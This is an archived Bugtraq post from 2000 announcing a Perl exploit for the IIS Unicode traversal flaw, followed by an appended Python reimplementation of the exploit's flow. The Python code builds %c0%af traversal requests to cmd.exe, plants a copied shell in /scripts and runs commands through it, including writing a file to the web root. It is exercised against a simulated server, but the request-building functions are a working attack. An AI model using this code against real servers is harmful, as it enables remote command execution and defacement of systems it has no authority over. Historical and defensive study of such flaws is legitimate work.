[17363] in bugtraq


Unicode exploit - version 2

daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Thu Oct 26 14:57:03 2000

Message-ID:  <Pine.BSF.4.21.0010261201040.3598-200000@wips.sensepost.com>
Date:         Thu, 26 Oct 2000 12:12:14 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

All,

http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806 applies:

After the discussion on Bugtraq et al. on the IIS Unicode flaw, this Perl
script will check for the existence of an 'alternative' cmd.exe and pass all
commands to the alternative shell, or create it if it does not exist, making
redirection of commands possible.

Credit to all that contributed.

Greetings,
Roelof.

------------------------------------------------------
Roelof W Temmingh		SensePost IT security
roelof@sensepost.com		+27 83 448 6996
		http://www.sensepost.com		

[Attachment: unicodexecute2.pl (Perl script, sent base64-encoded); the attachment body is not reproduced in this archive copy.]
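Added example (not the unicodexecute2.pl attachment and not SensePost's code): the control flow the post describes, written in Python so it can be exercised offline. It builds the Unicode-traversal request that reaches the real cmd.exe, first tries the command through a copied shell living inside the scripts directory, creates that copy when the attempt comes back 404, and retries through the copy, which is what makes redirection operators usable. A constructed FakeIIS class stands in for an unpatched IIS 4/5 host; the copied shell's name (alt.exe), the web root (c:\inetpub) and the exact server responses are assumptions made for this example, not details taken from the post or the script.

```python
"""
Added example, not the unicodexecute2.pl script from the post. Models the flow
the post describes: try the command through a copied shell in /scripts, create
the copy with the real cmd.exe if it is missing, retry through the copy so that
redirection operators work. FakeIIS is a constructed stand-in for the server.
"""
import ntpath
from urllib.parse import quote_plus, unquote, unquote_plus

UNICODE_SLASH = "%c0%af"            # overlong UTF-8 for '/', the form used in the advisories
SCRIPTS_VDIR = "/scripts"           # executable virtual directory on the IIS host
WEBROOT = r"c:\inetpub"             # assumed install location (not from the post)
REAL_SHELL = r"c:\winnt\system32\cmd.exe"
ALT_SHELL = "alt.exe"               # assumed name for the copied shell (not from the post)


def traversal_path(cmd: str, slash: str = UNICODE_SLASH) -> str:
    """Walk out of /scripts with '..<overlong slash>..' and run `cmd` via the real cmd.exe.
    quote_plus maps ' ' to '+' and percent-encodes > < | & so they survive the query string."""
    return f"{SCRIPTS_VDIR}/..{slash}../winnt/system32/cmd.exe?/c+{quote_plus(cmd)}"


def alt_shell_path(cmd: str) -> str:
    """Run `cmd` through the copied shell inside /scripts (no traversal needed)."""
    return f"{SCRIPTS_VDIR}/{ALT_SHELL}?/c+{quote_plus(cmd)}"


def run_through_alt_shell(http_get, cmd: str) -> str:
    """The post's flow: use the alternative shell, creating it first if it does not exist."""
    body = http_get(alt_shell_path(cmd))
    if body.startswith("404"):
        copy_cmd = f"copy {REAL_SHELL} {WEBROOT}\\scripts\\{ALT_SHELL}"
        http_get(traversal_path(copy_cmd))       # the only request that needs the traversal
        body = http_get(alt_shell_path(cmd))
    return body


class FakeIIS:
    """Constructed, simplified model of an unpatched IIS 4/5 host:
    - the '..' check runs on the URL before %c0%af is decoded (the bug),
    - redirection operators are refused when the executable is cmd.exe itself
      but accepted for a copy under another name (the behaviour the post relies on)."""

    def __init__(self):
        self.files = {REAL_SHELL.lower()}         # what exists on the fake disk
        self.requests = []                        # every GET path seen

    def get(self, path: str) -> str:
        self.requests.append(path)
        target, _, query = path.partition("?")
        # 1. traversal check on the standard-decoded URL: %c0%af is still two junk bytes here
        if ".." in unquote(target).split("/"):
            return "403 Forbidden"
        # 2. second decode pass turns the overlong sequence into a real separator
        url = target.lower().replace(UNICODE_SLASH, "/")
        if not url.startswith(SCRIPTS_VDIR + "/"):
            return "404 Not Found"
        disk = ntpath.normpath(WEBROOT + r"\scripts" + url[len(SCRIPTS_VDIR):])
        if disk not in self.files:
            return "404 Not Found"
        cmd = unquote_plus(query)[len("/c "):] if query.startswith("/c+") else ""
        if ntpath.basename(disk) == "cmd.exe" and any(ch in cmd for ch in "<>|"):
            return "500 Redirection not permitted for cmd.exe"
        return self._exec(cmd)

    def _exec(self, cmd: str) -> str:
        """Toy command interpreter: copy, dir and '>' redirection are enough for the flow."""
        words = cmd.split()
        if words[:1] == ["copy"] and len(words) == 3:
            if words[1].lower() not in self.files:
                return "The system cannot find the file specified."
            self.files.add(words[2].lower())
            return "1 file(s) copied."
        if words[:1] == ["dir"]:
            return "\n".join(sorted(self.files))
        if ">" in words:
            self.files.add(words[words.index(">") + 1].lower())
            return ""
        return "200 ran: " + cmd


if __name__ == "__main__":
    server = FakeIIS()
    run_through_alt_shell(server.get, r"echo owned > c:\inetpub\wwwroot\x.txt")
    for req in server.requests:          # the three GETs: probe, copy, retry
        print("GET", req)
    print(sorted(server.files))          # alt.exe and x.txt now exist
```

Running the module prints the three requests for one command, so the overlong slash in the copy request and the percent-encoded '>' in the retry can be compared side by side; a plain `/scripts/../../winnt/system32/cmd.exe` against the same FakeIIS gets the 403 that the Unicode form slips past, which is the check the vendor fix moved to after canonicalisation.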
